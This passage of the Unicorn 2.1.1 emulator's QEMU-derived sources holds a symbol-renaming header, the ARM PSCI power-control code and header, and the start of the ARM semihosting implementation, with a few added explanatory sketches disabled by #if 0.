cpu_sparc_set_id cpu_sparc_set_id_sparc64 #define cpu_sparc_init cpu_sparc_init_sparc64 #define helper_check_ieee_exceptions helper_check_ieee_exceptions_sparc64 #define helper_fadds helper_fadds_sparc64 #define helper_faddd helper_faddd_sparc64 #define helper_faddq helper_faddq_sparc64 #define helper_fsubs helper_fsubs_sparc64 #define helper_fsubd helper_fsubd_sparc64 #define helper_fsubq helper_fsubq_sparc64 #define helper_fmuls helper_fmuls_sparc64 #define helper_fmuld helper_fmuld_sparc64 #define helper_fmulq helper_fmulq_sparc64 #define helper_fdivs helper_fdivs_sparc64 #define helper_fdivd helper_fdivd_sparc64 #define helper_fdivq helper_fdivq_sparc64 #define helper_fsmuld helper_fsmuld_sparc64 #define helper_fsmulq helper_fsmulq_sparc64 #define helper_fdmulq helper_fdmulq_sparc64 #define helper_fnegs helper_fnegs_sparc64 #define helper_fnegd helper_fnegd_sparc64 #define helper_fnegq helper_fnegq_sparc64 #define helper_fitos helper_fitos_sparc64 #define helper_fitod helper_fitod_sparc64 #define helper_fitoq helper_fitoq_sparc64 #define helper_fxtos helper_fxtos_sparc64 #define helper_fxtod helper_fxtod_sparc64 #define helper_fxtoq helper_fxtoq_sparc64 #define helper_fdtos helper_fdtos_sparc64 #define helper_fstod helper_fstod_sparc64 #define helper_fqtos helper_fqtos_sparc64 #define helper_fstoq helper_fstoq_sparc64 #define helper_fqtod helper_fqtod_sparc64 #define helper_fdtoq helper_fdtoq_sparc64 #define helper_fstoi helper_fstoi_sparc64 #define helper_fdtoi helper_fdtoi_sparc64 #define helper_fqtoi helper_fqtoi_sparc64 #define helper_fstox helper_fstox_sparc64 #define helper_fdtox helper_fdtox_sparc64 #define helper_fqtox helper_fqtox_sparc64 #define helper_fabss helper_fabss_sparc64 #define helper_fabsd helper_fabsd_sparc64 #define helper_fabsq helper_fabsq_sparc64 #define helper_fsqrts helper_fsqrts_sparc64 #define helper_fsqrtd helper_fsqrtd_sparc64 #define helper_fsqrtq helper_fsqrtq_sparc64 #define helper_fcmps helper_fcmps_sparc64 #define helper_fcmpd helper_fcmpd_sparc64 #define helper_fcmpes helper_fcmpes_sparc64 #define helper_fcmped helper_fcmped_sparc64 #define helper_fcmpq helper_fcmpq_sparc64 #define helper_fcmpeq helper_fcmpeq_sparc64 #define helper_fcmps_fcc1 helper_fcmps_fcc1_sparc64 #define helper_fcmpd_fcc1 helper_fcmpd_fcc1_sparc64 #define helper_fcmpq_fcc1 helper_fcmpq_fcc1_sparc64 #define helper_fcmps_fcc2 helper_fcmps_fcc2_sparc64 #define helper_fcmpd_fcc2 helper_fcmpd_fcc2_sparc64 #define helper_fcmpq_fcc2 helper_fcmpq_fcc2_sparc64 #define helper_fcmps_fcc3 helper_fcmps_fcc3_sparc64 #define helper_fcmpd_fcc3 helper_fcmpd_fcc3_sparc64 #define helper_fcmpq_fcc3 helper_fcmpq_fcc3_sparc64 #define helper_fcmpes_fcc1 helper_fcmpes_fcc1_sparc64 #define helper_fcmped_fcc1 helper_fcmped_fcc1_sparc64 #define helper_fcmpeq_fcc1 helper_fcmpeq_fcc1_sparc64 #define helper_fcmpes_fcc2 helper_fcmpes_fcc2_sparc64 #define helper_fcmped_fcc2 helper_fcmped_fcc2_sparc64 #define helper_fcmpeq_fcc2 helper_fcmpeq_fcc2_sparc64 #define helper_fcmpes_fcc3 helper_fcmpes_fcc3_sparc64 #define helper_fcmped_fcc3 helper_fcmped_fcc3_sparc64 #define helper_fcmpeq_fcc3 helper_fcmpeq_fcc3_sparc64 #define helper_ldfsr helper_ldfsr_sparc64 #define helper_ldxfsr helper_ldxfsr_sparc64 #define cpu_raise_exception_ra cpu_raise_exception_ra_sparc64 #define helper_raise_exception helper_raise_exception_sparc64 #define helper_debug helper_debug_sparc64 #define helper_tick_set_count helper_tick_set_count_sparc64 #define helper_tick_get_count helper_tick_get_count_sparc64 #define helper_tick_set_limit 
helper_tick_set_limit_sparc64 #define helper_udiv helper_udiv_sparc64 #define helper_udiv_cc helper_udiv_cc_sparc64 #define helper_sdiv helper_sdiv_sparc64 #define helper_sdiv_cc helper_sdiv_cc_sparc64 #define helper_sdivx helper_sdivx_sparc64 #define helper_udivx helper_udivx_sparc64 #define helper_taddcctv helper_taddcctv_sparc64 #define helper_tsubcctv helper_tsubcctv_sparc64 #define helper_power_down helper_power_down_sparc64 #define sparc_cpu_do_interrupt sparc_cpu_do_interrupt_sparc64 #define leon3_irq_manager leon3_irq_manager_sparc64 #define cpu_tsptr cpu_tsptr_sparc64 #define helper_set_softint helper_set_softint_sparc64 #define helper_clear_softint helper_clear_softint_sparc64 #define helper_write_softint helper_write_softint_sparc64 #define helper_check_align helper_check_align_sparc64 #define helper_ld_asi helper_ld_asi_sparc64 #define helper_st_asi helper_st_asi_sparc64 #define sparc_cpu_do_transaction_failed sparc_cpu_do_transaction_failed_sparc64 #define sparc_cpu_do_unaligned_access sparc_cpu_do_unaligned_access_sparc64 #define sparc_cpu_tlb_fill sparc_cpu_tlb_fill_sparc64 #define mmu_probe mmu_probe_sparc64 #define sparc_cpu_memory_rw_debug sparc_cpu_memory_rw_debug_sparc64 #define cpu_get_phys_page_nofault cpu_get_phys_page_nofault_sparc64 #define sparc_cpu_get_phys_page_debug sparc_cpu_get_phys_page_debug_sparc64 #define gen_intermediate_code gen_intermediate_code_sparc64 #define sparc_tcg_init sparc_tcg_init_sparc64 #define restore_state_to_opc restore_state_to_opc_sparc64 #define cpu_set_cwp cpu_set_cwp_sparc64 #define cpu_get_psr cpu_get_psr_sparc64 #define cpu_put_psr_raw cpu_put_psr_raw_sparc64 #define cpu_put_psr cpu_put_psr_sparc64 #define cpu_cwp_inc cpu_cwp_inc_sparc64 #define cpu_cwp_dec cpu_cwp_dec_sparc64 #define helper_rett helper_rett_sparc64 #define helper_save helper_save_sparc64 #define helper_restore helper_restore_sparc64 #define helper_flushw helper_flushw_sparc64 #define helper_saved helper_saved_sparc64 #define helper_restored helper_restored_sparc64 #define helper_wrpsr helper_wrpsr_sparc64 #define helper_rdpsr helper_rdpsr_sparc64 #define cpu_get_ccr cpu_get_ccr_sparc64 #define cpu_put_ccr cpu_put_ccr_sparc64 #define cpu_get_cwp64 cpu_get_cwp64_sparc64 #define cpu_put_cwp64 cpu_put_cwp64_sparc64 #define helper_rdccr helper_rdccr_sparc64 #define helper_wrccr helper_wrccr_sparc64 #define helper_rdcwp helper_rdcwp_sparc64 #define helper_wrcwp helper_wrcwp_sparc64 #define cpu_gl_switch_gregs cpu_gl_switch_gregs_sparc64 #define helper_wrgl helper_wrgl_sparc64 #define cpu_change_pstate cpu_change_pstate_sparc64 #define helper_wrpstate helper_wrpstate_sparc64 #define helper_wrpil helper_wrpil_sparc64 #define helper_done helper_done_sparc64 #define helper_retry helper_retry_sparc64 #endif
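/*
 * Illustrative sketch (not from the original sources): what the header
 * above accomplishes. Unicorn compiles the QEMU core once per target
 * architecture and links all of them into one library, so every global
 * QEMU symbol is renamed with an architecture suffix via a generated
 * header of #defines like the one that just ended. The names foo_x86_64,
 * uc_cpu_exec() and the arch ids below are hypothetical, used only to
 * show the mechanism; the #if 0 guard keeps the sketch out of any build.
 */
#if 0
/* x86_64.h (generated): included by every x86_64 translation unit, so
 * a definition of cpu_exec() actually compiles as cpu_exec_x86_64(). */
#define cpu_exec cpu_exec_x86_64

/* sparc64.h (generated): the same source compiled again, new suffix. */
#define cpu_exec cpu_exec_sparc64

/* A hypothetical dispatcher can then select the per-arch entry point
 * at run time, since both renamed symbols coexist in one binary: */
int uc_cpu_exec(int arch, CPUState *cpu)
{
    switch (arch) {
    case 1: return cpu_exec_x86_64(cpu);   /* hypothetical arch ids */
    case 2: return cpu_exec_sparc64(cpu);
    default: return -1;
    }
}
#endif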
unicorn-2.1.1/qemu/target/
unicorn-2.1.1/qemu/target/arm/
unicorn-2.1.1/qemu/target/arm/README
code under arm/ is from arm-softmmu/target/arm/*.inc.c
code under aarch64/ is from aarch64-softmmu/target/aarch64/*.inc.c
WARNING: this code is auto-generated by scripts/decodetree.py; DO NOT modify it.
unicorn-2.1.1/qemu/target/arm/arm-powerctl.c
/*
 * QEMU support -- ARM Power Control specific functions.
 *
 * Copyright (c) 2016 Jean-Christophe Dubois
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 *
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "cpu-qom.h"
#include "internals.h"
#include "arm-powerctl.h"
#include "qemu/log.h"

#ifndef DEBUG_ARM_POWERCTL
#define DEBUG_ARM_POWERCTL 0
#endif

#define DPRINTF(fmt, args...) \
    do { \
        if (DEBUG_ARM_POWERCTL) { \
            fprintf(stderr, "[ARM]%s: " fmt, __func__, ##args); \
        } \
    } while (0)

CPUState *arm_get_cpu_by_id(uint64_t id)
{
    CPUState *cpu;

    DPRINTF("cpu %" PRId64 "\n", id);

    CPU_FOREACH(cpu) {
        ARMCPU *armcpu = ARM_CPU(cpu);

        if (armcpu->mp_affinity == id) {
            return cpu;
        }
    }

    qemu_log_mask(LOG_GUEST_ERROR,
                  "[ARM]%s: Requesting unknown CPU %" PRId64 "\n",
                  __func__, id);

    return NULL;
}

struct CpuOnInfo {
    uint64_t entry;
    uint64_t context_id;
    uint32_t target_el;
    bool target_aa64;
};

static void arm_set_cpu_on_async_work(CPUState *target_cpu_state,
                                      run_on_cpu_data data)
{
    ARMCPU *target_cpu = ARM_CPU(target_cpu_state);
    struct CpuOnInfo *info = (struct CpuOnInfo *) data.host_ptr;

    /* Initialize the cpu we are turning on */
    cpu_reset(target_cpu_state);
    target_cpu_state->halted = 0;

    if (info->target_aa64) {
        if ((info->target_el < 3) && arm_feature(&target_cpu->env,
                                                 ARM_FEATURE_EL3)) {
            /*
             * As target mode is AArch64, we need to set lower
             * exception level (the requested level 2) to AArch64
             */
            target_cpu->env.cp15.scr_el3 |= SCR_RW;
        }

        if ((info->target_el < 2) && arm_feature(&target_cpu->env,
                                                 ARM_FEATURE_EL2)) {
            /*
             * As target mode is AArch64, we need to set lower
             * exception level (the requested level 1) to AArch64
             */
            target_cpu->env.cp15.hcr_el2 |= HCR_RW;
        }

        target_cpu->env.pstate = aarch64_pstate_mode(info->target_el, true);
    } else {
        /* We are requested to boot in AArch32 mode */
        static const uint32_t mode_for_el[] = { 0,
                                                ARM_CPU_MODE_SVC,
                                                ARM_CPU_MODE_HYP,
                                                ARM_CPU_MODE_SVC };

        cpsr_write(&target_cpu->env, mode_for_el[info->target_el], CPSR_M,
                   CPSRWriteRaw);
    }

    if (info->target_el == 3) {
        /* Processor is in secure mode */
        target_cpu->env.cp15.scr_el3 &= ~SCR_NS;
    } else {
        /* Processor is not in secure mode */
        target_cpu->env.cp15.scr_el3 |= SCR_NS;

        /* Set NSACR.{CP11,CP10} so NS can access the FPU */
        target_cpu->env.cp15.nsacr |= 3 << 10;

        /*
         * If QEMU is providing the equivalent of EL3 firmware, then we need
         * to make sure a CPU targeting EL2 comes out of reset with a
         * functional HVC insn.
         */
        if (arm_feature(&target_cpu->env, ARM_FEATURE_EL3) &&
            info->target_el == 2) {
            target_cpu->env.cp15.scr_el3 |= SCR_HCE;
        }
    }

    /* We check if the started CPU is now at the correct level */
    assert(info->target_el == arm_current_el(&target_cpu->env));

    if (info->target_aa64) {
        target_cpu->env.xregs[0] = info->context_id;
    } else {
        target_cpu->env.regs[0] = info->context_id;
    }

    /* CP15 update requires rebuilding hflags */
    arm_rebuild_hflags(&target_cpu->env);

    /* Start the new CPU at the requested address */
    cpu_set_pc(target_cpu_state, info->entry);

    g_free(info);

    /* Finally set the power status */
    target_cpu->power_state = PSCI_ON;
}

int arm_set_cpu_on(uint64_t cpuid, uint64_t entry, uint64_t context_id,
                   uint32_t target_el, bool target_aa64)
{
    CPUState *target_cpu_state;
    ARMCPU *target_cpu;
    struct CpuOnInfo *info;

    DPRINTF("cpu %" PRId64 " (EL %d, %s) @ 0x%" PRIx64 " with R0 = 0x%" PRIx64
            "\n", cpuid, target_el, target_aa64 ? "aarch64" : "aarch32",
            entry, context_id);

    /* The requested EL needs to be in the 1 to 3 range */
    assert((target_el > 0) && (target_el < 4));

    if (target_aa64 && (entry & 3)) {
        /*
         * If we are booting in AArch64 mode then "entry" needs to be 4-byte
         * aligned.
         */
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }

    /* Retrieve the cpu we are powering up */
    target_cpu_state = arm_get_cpu_by_id(cpuid);
    if (!target_cpu_state) {
        /* The cpu was not found */
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }

    target_cpu = ARM_CPU(target_cpu_state);
    if (target_cpu->power_state == PSCI_ON) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "[ARM]%s: CPU %" PRId64 " is already on\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_ALREADY_ON;
    }

    /*
     * The newly brought CPU is requested to enter the exception level
     * "target_el" and be in the requested mode (AArch64 or AArch32).
     */
    if (((target_el == 3) && !arm_feature(&target_cpu->env, ARM_FEATURE_EL3)) ||
        ((target_el == 2) && !arm_feature(&target_cpu->env, ARM_FEATURE_EL2))) {
        /* The CPU does not support the requested level */
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }

    if (!target_aa64 && arm_feature(&target_cpu->env, ARM_FEATURE_AARCH64)) {
        /*
         * For now we don't support booting an AArch64 CPU in AArch32 mode
         * TODO: We should add this support later
         */
        qemu_log_mask(LOG_UNIMP,
                      "[ARM]%s: Starting AArch64 CPU %" PRId64
                      " in AArch32 mode is not supported yet\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }

    /*
     * If another CPU has powered the target on we are in the state
     * ON_PENDING and additional attempts to power on the CPU should
     * fail (see 6.6 Implementation CPU_ON/CPU_OFF races in the PSCI
     * spec)
     */
    if (target_cpu->power_state == PSCI_ON_PENDING) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "[ARM]%s: CPU %" PRId64 " is already powering on\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_ON_PENDING;
    }

    /*
     * To avoid racing with a CPU we are just kicking off, we do the
     * final bit of preparation for the work in the target CPU's
     * context.
     */
    info = g_new(struct CpuOnInfo, 1);
    info->entry = entry;
    info->context_id = context_id;
    info->target_el = target_el;
    info->target_aa64 = target_aa64;

    async_run_on_cpu(target_cpu_state, arm_set_cpu_on_async_work,
                     RUN_ON_CPU_HOST_PTR(info));

    /* We are good to go */
    return QEMU_ARM_POWERCTL_RET_SUCCESS;
}

static void arm_set_cpu_on_and_reset_async_work(CPUState *target_cpu_state,
                                                run_on_cpu_data data)
{
    ARMCPU *target_cpu = ARM_CPU(target_cpu_state);

    /* Initialize the cpu we are turning on */
    cpu_reset(target_cpu_state);
    target_cpu_state->halted = 0;

    /* Finally set the power status */
    target_cpu->power_state = PSCI_ON;
}

int arm_set_cpu_on_and_reset(uint64_t cpuid)
{
    CPUState *target_cpu_state;
    ARMCPU *target_cpu;

    /* Retrieve the cpu we are powering up */
    target_cpu_state = arm_get_cpu_by_id(cpuid);
    if (!target_cpu_state) {
        /* The cpu was not found */
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }

    target_cpu = ARM_CPU(target_cpu_state);
    if (target_cpu->power_state == PSCI_ON) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "[ARM]%s: CPU %" PRId64 " is already on\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_ALREADY_ON;
    }

    /*
     * If another CPU has powered the target on we are in the state
     * ON_PENDING and additional attempts to power on the CPU should
     * fail (see 6.6 Implementation CPU_ON/CPU_OFF races in the PSCI
     * spec)
     */
    if (target_cpu->power_state == PSCI_ON_PENDING) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "[ARM]%s: CPU %" PRId64 " is already powering on\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_ON_PENDING;
    }

    async_run_on_cpu(target_cpu_state, arm_set_cpu_on_and_reset_async_work,
                     RUN_ON_CPU_NULL);

    /* We are good to go */
    return QEMU_ARM_POWERCTL_RET_SUCCESS;
}
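/*
 * Illustrative sketch, not part of the original file: how a PSCI CPU_ON
 * emulation might drive the API above. The arm_set_cpu_on() signature
 * and the QEMU_ARM_POWERCTL_* constants are real; the function itself
 * and its caller-side conventions are assumptions, and the #if 0 guard
 * keeps it out of the build.
 */
#if 0
static int example_psci_cpu_on(uint64_t target_mpidr, uint64_t entry_point,
                               uint64_t context_id)
{
    /*
     * Ask for EL1 in AArch64 state. arm_set_cpu_on() only queues
     * arm_set_cpu_on_async_work() on the target vCPU and returns at
     * once, so the caller must treat the power-up as asynchronous.
     */
    int ret = arm_set_cpu_on(target_mpidr, entry_point, context_id,
                             1 /* target_el */, true /* target_aa64 */);

    if (ret == QEMU_ARM_POWERCTL_ON_PENDING) {
        /* Racing CPU_ON calls: per the PSCI spec this one must fail. */
    }
    return ret;
}
#endif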
static void arm_set_cpu_off_async_work(CPUState *target_cpu_state,
                                       run_on_cpu_data data)
{
    ARMCPU *target_cpu = ARM_CPU(target_cpu_state);

    target_cpu->power_state = PSCI_OFF;
    target_cpu_state->halted = 1;
    target_cpu_state->exception_index = EXCP_HLT;
}

int arm_set_cpu_off(uint64_t cpuid)
{
    CPUState *target_cpu_state;
    ARMCPU *target_cpu;

    DPRINTF("cpu %" PRId64 "\n", cpuid);

    /* Change to the cpu we are powering down */
    target_cpu_state = arm_get_cpu_by_id(cpuid);
    if (!target_cpu_state) {
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }
    target_cpu = ARM_CPU(target_cpu_state);
    if (target_cpu->power_state == PSCI_OFF) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "[ARM]%s: CPU %" PRId64 " is already off\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_IS_OFF;
    }

    /* Queue work to run under the target vCPU's context */
    async_run_on_cpu(target_cpu_state, arm_set_cpu_off_async_work,
                     RUN_ON_CPU_NULL);

    return QEMU_ARM_POWERCTL_RET_SUCCESS;
}

static void arm_reset_cpu_async_work(CPUState *target_cpu_state,
                                     run_on_cpu_data data)
{
    /* Reset the cpu */
    cpu_reset(target_cpu_state);
}

int arm_reset_cpu(uint64_t cpuid)
{
    CPUState *target_cpu_state;
    ARMCPU *target_cpu;

    DPRINTF("cpu %" PRId64 "\n", cpuid);

    /* Change to the cpu we are resetting */
    target_cpu_state = arm_get_cpu_by_id(cpuid);
    if (!target_cpu_state) {
        return QEMU_ARM_POWERCTL_INVALID_PARAM;
    }
    target_cpu = ARM_CPU(target_cpu_state);
    if (target_cpu->power_state == PSCI_OFF) {
        qemu_log_mask(LOG_GUEST_ERROR,
                      "[ARM]%s: CPU %" PRId64 " is off\n",
                      __func__, cpuid);
        return QEMU_ARM_POWERCTL_IS_OFF;
    }

    /* Queue work to run under the target vCPU's context */
    async_run_on_cpu(target_cpu_state, arm_reset_cpu_async_work,
                     RUN_ON_CPU_NULL);

    return QEMU_ARM_POWERCTL_RET_SUCCESS;
}
unicorn-2.1.1/qemu/target/arm/arm-powerctl.h
/*
 * QEMU support -- ARM Power Control specific functions.
 *
 * Copyright (c) 2016 Jean-Christophe Dubois
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 *
 */

#ifndef QEMU_ARM_POWERCTL_H
#define QEMU_ARM_POWERCTL_H

#include "kvm-consts.h"

#define QEMU_ARM_POWERCTL_RET_SUCCESS QEMU_PSCI_RET_SUCCESS
#define QEMU_ARM_POWERCTL_INVALID_PARAM QEMU_PSCI_RET_INVALID_PARAMS
#define QEMU_ARM_POWERCTL_ALREADY_ON QEMU_PSCI_RET_ALREADY_ON
#define QEMU_ARM_POWERCTL_IS_OFF QEMU_PSCI_RET_DENIED
#define QEMU_ARM_POWERCTL_ON_PENDING QEMU_PSCI_RET_ON_PENDING

/*
 * arm_get_cpu_by_id:
 * @cpuid: the id of the CPU whose state we want to retrieve
 *
 * Retrieve a CPUState object from its CPU ID provided in @cpuid.
 *
 * Returns: a pointer to the CPUState structure of the requested CPU.
 */
CPUState *arm_get_cpu_by_id(uint64_t cpuid);

/*
 * arm_set_cpu_on:
 * @cpuid: the id of the CPU we want to start/wake up.
 * @entry: the address the CPU shall start from.
 * @context_id: the value to put in r0/x0.
 * @target_el: The desired exception level.
 * @target_aa64: 1 if the requested mode is AArch64. 0 otherwise.
 *
 * Start the cpu designated by @cpuid in @target_el exception level.
 * The mode shall be AArch64 if @target_aa64 is set to 1. Otherwise the mode
 * is AArch32. The CPU shall start at @entry with @context_id in r0/x0.
 *
 * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success.
 * QEMU_ARM_POWERCTL_INVALID_PARAM if bad parameters are provided.
 * QEMU_ARM_POWERCTL_ALREADY_ON if the CPU was already started.
 * QEMU_ARM_POWERCTL_ON_PENDING if the CPU is still powering up
 */
int arm_set_cpu_on(uint64_t cpuid, uint64_t entry, uint64_t context_id,
                   uint32_t target_el, bool target_aa64);

/*
 * arm_set_cpu_off:
 * @cpuid: the id of the CPU we want to stop/shut down.
 *
 * Stop the cpu designated by @cpuid.
 *
 * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success.
 * QEMU_ARM_POWERCTL_INVALID_PARAM if bad parameters are provided.
 * QEMU_ARM_POWERCTL_IS_OFF if CPU is already off
 */
int arm_set_cpu_off(uint64_t cpuid);

/*
 * arm_reset_cpu:
 * @cpuid: the id of the CPU we want to reset.
 *
 * Reset the cpu designated by @cpuid.
 *
 * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success.
 * QEMU_ARM_POWERCTL_INVALID_PARAM if bad parameters are provided.
 * QEMU_ARM_POWERCTL_IS_OFF if CPU is off
 */
int arm_reset_cpu(uint64_t cpuid);

/*
 * arm_set_cpu_on_and_reset:
 * @cpuid: the id of the CPU we want to start
 *
 * Start the cpu designated by @cpuid and put it through its normal
 * CPU reset process. The CPU will start in the way it is architected
 * to start after a power-on reset.
 *
 * Returns: QEMU_ARM_POWERCTL_RET_SUCCESS on success.
 * QEMU_ARM_POWERCTL_INVALID_PARAM if there is no CPU with that ID.
 * QEMU_ARM_POWERCTL_ALREADY_ON if the CPU is already on.
 * QEMU_ARM_POWERCTL_ON_PENDING if the CPU is already partway through
 * powering on.
 */
int arm_set_cpu_on_and_reset(uint64_t cpuid);

#endif
unicorn-2.1.1/qemu/target/arm/arm-semi.c
/*
 * Arm "Angel" semihosting syscalls
 *
 * Copyright (c) 2005, 2007 CodeSourcery.
 * Copyright (c) 2019 Linaro
 * Written by Paul Brook.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, see <http://www.gnu.org/licenses/>.
 *
 * ARM Semihosting is documented in:
 *     Semihosting for AArch32 and AArch64 Release 2.0
 *     https://static.docs.arm.com/100863/0200/semihosting.pdf
 */

#include "qemu/osdep.h"
#include "cpu.h"
//#include "hw/semihosting/semihost.h"
//#include "hw/semihosting/console.h"
#include "qemu/log.h"
#include "exec/gdbstub.h"
#include "qemu/cutils.h"

#define TARGET_SYS_OPEN          0x01
#define TARGET_SYS_CLOSE         0x02
#define TARGET_SYS_WRITEC        0x03
#define TARGET_SYS_WRITE0        0x04
#define TARGET_SYS_WRITE         0x05
#define TARGET_SYS_READ          0x06
#define TARGET_SYS_READC         0x07
#define TARGET_SYS_ISTTY         0x09
#define TARGET_SYS_SEEK          0x0a
#define TARGET_SYS_FLEN          0x0c
#define TARGET_SYS_TMPNAM        0x0d
#define TARGET_SYS_REMOVE        0x0e
#define TARGET_SYS_RENAME        0x0f
#define TARGET_SYS_CLOCK         0x10
#define TARGET_SYS_TIME          0x11
#define TARGET_SYS_SYSTEM        0x12
#define TARGET_SYS_ERRNO         0x13
#define TARGET_SYS_GET_CMDLINE   0x15
#define TARGET_SYS_HEAPINFO      0x16
#define TARGET_SYS_EXIT          0x18
#define TARGET_SYS_SYNCCACHE     0x19
#define TARGET_SYS_EXIT_EXTENDED 0x20

/* ADP_Stopped_ApplicationExit is used for exit(0),
 * anything else is implemented as exit(1) */
#define ADP_Stopped_ApplicationExit (0x20026)
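/*
 * Illustrative sketch, not part of the original file: what one of these
 * calls looks like from the guest side. On AArch64 the guest places the
 * operation number in W0 and a parameter (or parameter-block address) in
 * X1, then executes HLT #0xF000, which QEMU intercepts and dispatches to
 * the handlers in this file. The helper below is assumed guest code, not
 * host code, and the #if 0 guard keeps it out of the build.
 */
#if 0
/* Guest code (AArch64): print a NUL-terminated string via SYS_WRITE0. */
static void guest_semi_write0(const char *s)
{
    register uint64_t op __asm__("x0") = 0x04;         /* TARGET_SYS_WRITE0 */
    register uint64_t arg __asm__("x1") = (uint64_t)s; /* string address */

    /* x0 receives the call's return value, hence the "+r" constraint. */
    __asm__ volatile("hlt #0xf000" : "+r"(op) : "r"(arg) : "memory");
}
#endif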
#ifndef O_BINARY
#define O_BINARY 0
#endif

#define GDB_O_RDONLY 0x000
#define GDB_O_WRONLY 0x001
#define GDB_O_RDWR   0x002
#define GDB_O_APPEND 0x008
#define GDB_O_CREAT  0x200
#define GDB_O_TRUNC  0x400
#define GDB_O_BINARY 0

static int gdb_open_modeflags[12] = {
    GDB_O_RDONLY,
    GDB_O_RDONLY | GDB_O_BINARY,
    GDB_O_RDWR,
    GDB_O_RDWR | GDB_O_BINARY,
    GDB_O_WRONLY | GDB_O_CREAT | GDB_O_TRUNC,
    GDB_O_WRONLY | GDB_O_CREAT | GDB_O_TRUNC | GDB_O_BINARY,
    GDB_O_RDWR | GDB_O_CREAT | GDB_O_TRUNC,
    GDB_O_RDWR | GDB_O_CREAT | GDB_O_TRUNC | GDB_O_BINARY,
    GDB_O_WRONLY | GDB_O_CREAT | GDB_O_APPEND,
    GDB_O_WRONLY | GDB_O_CREAT | GDB_O_APPEND | GDB_O_BINARY,
    GDB_O_RDWR | GDB_O_CREAT | GDB_O_APPEND,
    GDB_O_RDWR | GDB_O_CREAT | GDB_O_APPEND | GDB_O_BINARY
};

static int open_modeflags[12] = {
    O_RDONLY,
    O_RDONLY | O_BINARY,
    O_RDWR,
    O_RDWR | O_BINARY,
    O_WRONLY | O_CREAT | O_TRUNC,
    O_WRONLY | O_CREAT | O_TRUNC | O_BINARY,
    O_RDWR | O_CREAT | O_TRUNC,
    O_RDWR | O_CREAT | O_TRUNC | O_BINARY,
    O_WRONLY | O_CREAT | O_APPEND,
    O_WRONLY | O_CREAT | O_APPEND | O_BINARY,
    O_RDWR | O_CREAT | O_APPEND,
    O_RDWR | O_CREAT | O_APPEND | O_BINARY
};
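/*
 * Illustrative sketch, not part of the original file. The twelve entries
 * in each table above are indexed by the SYS_OPEN "mode" argument, which
 * the semihosting spec defines as the index of the equivalent ISO C
 * fopen() mode string. The summary below is an editorial assumption
 * based on the Release 2.0 spec cited in the file header, guarded out
 * of the build with #if 0.
 */
#if 0
static const char *const fopen_mode_for_index[12] = {
    "r", "rb", "r+", "r+b", /* 0-3:  read / read-update      */
    "w", "wb", "w+", "w+b", /* 4-7:  truncate or create      */
    "a", "ab", "a+", "a+b", /* 8-11: append                  */
};
/* e.g. a guest SYS_OPEN with mode 5 ("wb") would map to
 *      open_modeflags[5] == O_WRONLY | O_CREAT | O_TRUNC | O_BINARY */
#endif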
Start guestfd from 1 */ for (i = 1; i < guestfd_array->len; i++) { GuestFD *gf = &g_array_index(guestfd_array, GuestFD, i); if (gf->type == GuestFDUnused) { return i; } } /* All elements already in use: expand the array */ g_array_set_size(guestfd_array, i + 1); return i; } /* * Look up the guestfd in the data structure; return NULL * for out of bounds, but don't check whether the slot is unused. * This is used internally by the other guestfd functions. */ static GuestFD *do_get_guestfd(int guestfd) { if (!guestfd_array) { return NULL; } if (guestfd <= 0 || guestfd >= guestfd_array->len) { return NULL; } return &g_array_index(guestfd_array, GuestFD, guestfd); } /* * Associate the specified guest fd (which must have been * allocated via alloc_fd() and not previously used) with * the specified host/gdb fd. */ static void associate_guestfd(int guestfd, int hostfd) { GuestFD *gf = do_get_guestfd(guestfd); assert(gf); gf->type = use_gdb_syscalls() ? GuestFDGDB : GuestFDHost; gf->hostfd = hostfd; } /* * Deallocate the specified guest file descriptor. This doesn't * close the host fd, it merely undoes the work of alloc_fd(). */ static void dealloc_guestfd(int guestfd) { GuestFD *gf = do_get_guestfd(guestfd); assert(gf); gf->type = GuestFDUnused; } /* * Given a guest file descriptor, get the associated struct. * If the fd is not valid, return NULL. This is the function * used by the various semihosting calls to validate a handle * from the guest. * Note: calling alloc_guestfd() or dealloc_guestfd() will * invalidate any GuestFD* obtained by calling this function. */ static GuestFD *get_guestfd(int guestfd) { GuestFD *gf = do_get_guestfd(guestfd); if (!gf || gf->type == GuestFDUnused) { return NULL; } return gf; } /* * The semihosting API has no concept of its errno being thread-safe, * as the API design predates SMP CPUs and was intended as a simple * real-hardware set of debug functionality. For QEMU, we make the * errno be per-thread in linux-user mode; in softmmu it is a simple * global, and we assume that the guest takes care of avoiding any races. */ static target_ulong syscall_err; #include "exec/softmmu-semi.h" static inline uint32_t set_swi_errno(CPUARMState *env, uint32_t code) { if (code == (uint32_t)-1) { syscall_err = errno; } return code; } static inline uint32_t get_swi_errno(CPUARMState *env) { return syscall_err; } static target_ulong arm_semi_syscall_len; static void arm_semi_cb(CPUState *cs, target_ulong ret, target_ulong err) { ARMCPU *cpu = 